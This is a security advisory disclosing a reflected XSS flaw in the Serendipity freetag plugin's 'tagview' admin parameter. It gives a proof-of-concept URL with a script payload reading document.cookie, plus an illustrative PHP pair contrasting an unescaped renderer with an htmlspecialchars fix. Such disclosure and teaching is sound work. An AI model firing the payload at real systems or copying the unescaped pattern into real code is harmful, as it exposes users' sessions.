SSCHADV2011-016 - Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
Advisory: Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
Advisory ID: SSCHADV2011-016
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.5.5
Vendor URL:
Vendor Status: fixed
CVE-ID: -
======================
Vulnerability Description:
======================
The freetag plugin parameter "serendipity[tagview]" in the Serendipity backend is prone to a reflected Cross-Site Scripting vulnerability: the value is written back into the admin page without being HTML-encoded.
==============
Technical Details:
==============
http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=<script>alert(document.cookie)</script>
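The following PHP snippet is an added illustration written for this page; it is not Serendipity's own code and does not reproduce the plugin's handler. It models the defect class the advisory describes with a hypothetical `render_tagview_*` pair: the unsafe variant reflects the request parameter into the HTML response unchanged, while the hardened variant HTML-encodes it with `htmlspecialchars()` before output. The request array is constructed inline to mirror the proof-of-concept value above.

```php
<?php
// Added example (not Serendipity code): reflected XSS via an unescaped
// request parameter, and the escaped form that neutralises it.

// Constructed request, shaped like the advisory's proof-of-concept.
$request = [
    'serendipity' => [
        'adminModule' => 'event_display',
        'adminAction' => 'managetags',
        'tagview'     => '<script>alert(document.cookie)</script>',
    ],
];

// Vulnerable pattern (hypothetical): the parameter is concatenated straight
// into markup, so any HTML in it becomes part of the page.
function render_tagview_unsafe(array $get): string
{
    $tagview = $get['serendipity']['tagview'] ?? '';
    return '<h2>Tag view: ' . $tagview . '</h2>';
}

// Hardened pattern (hypothetical): encode for the HTML text context before
// output. ENT_QUOTES also covers attribute contexts; the charset must match
// the page's declared encoding.
function render_tagview_safe(array $get): string
{
    $tagview = $get['serendipity']['tagview'] ?? '';
    $escaped = htmlspecialchars($tagview, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h2>Tag view: ' . $escaped . '</h2>';
}

// Demonstration: the unsafe output contains a live <script> element,
// the safe output contains only the literal text &lt;script&gt;...
echo render_tagview_unsafe($request), PHP_EOL;
echo render_tagview_safe($request), PHP_EOL;

// Quick regression check a maintainer could keep in a test suite.
assert(strpos(render_tagview_safe($request), '<script') === false);
assert(strpos(render_tagview_safe($request), '&lt;script&gt;') !== false);
```

Output encoding is the fix that addresses the reported issue directly. Where the parameter is only ever expected to hold a tag name, an additional input allowlist (letters, digits, a few separators) makes the reflected value even less useful to an attacker, but it is a supplement to encoding, not a replacement for it.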
=====
Solution:
=====
Update to the latest version
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
23-Sep-2011 – fixed in the latest version
25-Sep-2011 – release date of this security advisory
25-Sep-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.s9y.org